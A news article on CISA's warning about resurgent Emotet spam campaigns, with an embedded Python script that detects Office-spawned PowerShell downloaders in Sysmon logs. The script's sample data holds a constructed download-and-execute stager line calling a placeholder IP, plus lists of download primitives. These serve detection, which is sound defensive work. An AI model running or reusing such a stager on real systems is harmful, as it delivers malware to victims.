The U.S. Department of Homeland Security's Cybersecurity and Infrastructure Security Agency (CISA) has issued a warning over an increase in Emotet malware activity.
The Emotet botnet sprang back to life on January 13, 2020, with large-scale spam campaigns detected spreading the Emotet Trojan.
Emotet is a modular Trojan that has served as a banking Trojan, an information stealer, and a downloader for other malware. It can move laterally by brute forcing user credentials and writing copies of itself to network shares. It also spreads by emailing copies of itself from infected devices: Emotet harvests mailbox contents and contact lists from an infected machine and uses them to craft messages, including replies to existing email threads, which are then sent to the victim's contacts.
Emotet was developed by a threat group called TA542. TA542 often works with other malware developers, renting out its botnet to spread additional malicious payloads such as cryptocurrency miners, cryptowallet stealers, the TrickBot Trojan, and Ryuk ransomware.
Emotet is primarily spread via spam emails carrying Office attachments with malicious macros; when a user enables the macros, they run PowerShell commands that download the Trojan. The Office files masquerade as invoices, purchase orders, receipts, statements, agreements, and other document types commonly used by businesses. Businesses are the main target, although any device that opens the attachment is at risk. Because the infection chain depends on a user enabling macros and on an Office process launching PowerShell, blocking macros in documents received from the internet and alerting on Office applications that spawn scripting hosts both break the chain before the payload is fetched.
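As an added illustration of the detection point above (this is example code written for this article, not a tool from CISA, Proofpoint or the Emotet research community), the script below scans process-creation records for the maldoc pattern: an Office application spawning a scripting host, optionally with a hidden window and a base64-encoded PowerShell command, which it decodes and checks for download primitives. The field names (Image, ParentImage, CommandLine, ProcessId) follow Sysmon Event ID 1; the log records, file paths, the stager text and the 203.0.113.7 address are all constructed samples, and the indicator lists are illustrative rather than complete.

```python
"""Flag Office-spawned PowerShell downloaders in process-creation logs (example code)."""
import base64
import binascii
import json

# Office hosts that open mailed attachments, and the script hosts a maldoc
# macro typically launches from them. Illustrative lists, not exhaustive.
OFFICE_HOSTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe",
                "cscript.exe", "mshta.exe", "rundll32.exe", "regsvr32.exe"}
# Download / execution primitives commonly seen in a decoded stager.
DOWNLOAD_MARKERS = ("downloadstring", "downloadfile", "net.webclient",
                    "invoke-webrequest", "start-bitstransfer",
                    "invoke-expression", "iex", "http://", "https://")


def image_name(path: str) -> str:
    """Lower-cased basename of a Windows path; works when run on any host OS."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def flag_value(tokens, name, aliases=()):
    """Value following a powershell.exe switch given as any prefix of `name`
    (powershell.exe accepts -e, -enc, -encodedcommand, ...) or as an alias."""
    for i, tok in enumerate(tokens[:-1]):
        if not tok.startswith(("-", "/")):
            continue
        flag = tok.lstrip("-/").lower()
        if flag and (flag in aliases or name.startswith(flag)):
            return tokens[i + 1].strip("'\"")
    return ""


def decode_encoded_command(cmdline: str) -> str:
    """Return the decoded -EncodedCommand payload (base64 of UTF-16LE text), or ''."""
    encoded = flag_value(cmdline.split(), "encodedcommand", aliases=("ec",))
    if not encoded:
        return ""
    try:
        raw = base64.b64decode(encoded, validate=True)
    except (binascii.Error, ValueError):
        return ""
    return raw.decode("utf-16-le", errors="replace")


def classify(record: dict) -> dict:
    """Score one process-creation record and list why it looks like a maldoc stager."""
    parent = image_name(record.get("ParentImage", ""))
    child = image_name(record.get("Image", ""))
    cmdline = record.get("CommandLine", "")
    tokens = cmdline.split()
    decoded = decode_encoded_command(cmdline)
    reasons = []
    if parent in OFFICE_HOSTS and child in SCRIPT_HOSTS:
        reasons.append(f"{parent} spawned {child}")
        if flag_value(tokens, "windowstyle").lower() == "hidden":
            reasons.append("hidden window")
        if decoded:
            reasons.append("encoded PowerShell command")
        # Substring matching over the visible and decoded command is a
        # deliberately simple heuristic; tune it against your own telemetry.
        text = (cmdline + " " + decoded).lower()
        hits = sorted(m for m in DOWNLOAD_MARKERS if m in text)
        if hits:
            reasons.append("download/exec primitives: " + ", ".join(hits))
    if not reasons:
        severity = "none"
    elif any(r.startswith("download/exec") for r in reasons):
        severity = "high"
    else:
        severity = "medium"
    return {"severity": severity, "reasons": reasons, "decoded": decoded}


def scan(log_lines):
    """Run classify() over newline-delimited JSON records; return the flagged ones."""
    findings = []
    for line in log_lines:
        rec = json.loads(line)
        result = classify(rec)
        if result["severity"] != "none":
            findings.append({"pid": rec.get("ProcessId"), **result})
    return findings


# Constructed sample data: a typical one-line stager and four process events.
STAGER = "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.7/doc.php')"
STAGER_B64 = base64.b64encode(STAGER.encode("utf-16-le")).decode()
OFFICE_DIR = r"C:\Program Files\Microsoft Office\root\Office16"
PS_EXE = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_LOG = [json.dumps(r) for r in [
    {"ProcessId": 4120, "ParentImage": OFFICE_DIR + r"\WINWORD.EXE", "Image": PS_EXE,
     "CommandLine": f"powershell -nop -w hidden -enc {STAGER_B64}"},
    {"ProcessId": 4188, "ParentImage": r"C:\Windows\explorer.exe", "Image": PS_EXE,
     "CommandLine": "powershell -Command Get-Process"},
    {"ProcessId": 4301, "ParentImage": OFFICE_DIR + r"\EXCEL.EXE",
     "Image": r"C:\Windows\System32\cmd.exe", "CommandLine": "cmd /c echo test"},
    {"ProcessId": 4355, "ParentImage": OFFICE_DIR + r"\WINWORD.EXE",
     "Image": r"C:\Windows\splwow64.exe", "CommandLine": "splwow64.exe 12288"},
]]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(json.dumps(finding, indent=2))
```

Run against the embedded samples, the Word-to-PowerShell event with the encoded downloader is reported as high severity and the Excel-to-cmd event as medium, while the explorer-launched PowerShell and Word's print helper (splwow64.exe) are left alone. The same logic maps directly onto a SIEM rule over Sysmon or EDR process telemetry; the encoded-command decoding is worth keeping, because Emotet stagers are rarely readable on the visible command line.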
Some of the campaigns detected in the past few days have been targeted at specific industry sectors such as the pharmaceutical industry. Proofpoint identified one pharma-focused campaign that sent almost 750,000 emails in a single day. The attacks were initially aimed at companies in the United States, Canada, and Mexico, before the campaign spread to 11 more countries. Other spam campaigns have sent emails to users in more than 80 countries.
Emotet poses a major threat. Infections can result in data theft, considerable financial loss, and reputational damage, and they are difficult to remediate. Multiple devices on the network are often infected, and any device that has not yet been cleaned will re-infect devices that have, so every infected host must be isolated and cleaned before any of them is returned to the network.
CISA has issued detailed guidance on the malware and the steps that can be taken to improve defenses and remediate attacks.